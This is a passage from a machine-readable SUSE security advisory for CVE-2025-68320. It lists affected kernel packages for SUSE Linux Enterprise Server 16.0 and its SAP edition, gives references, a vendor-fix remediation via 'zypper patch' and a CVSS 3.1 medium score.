"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
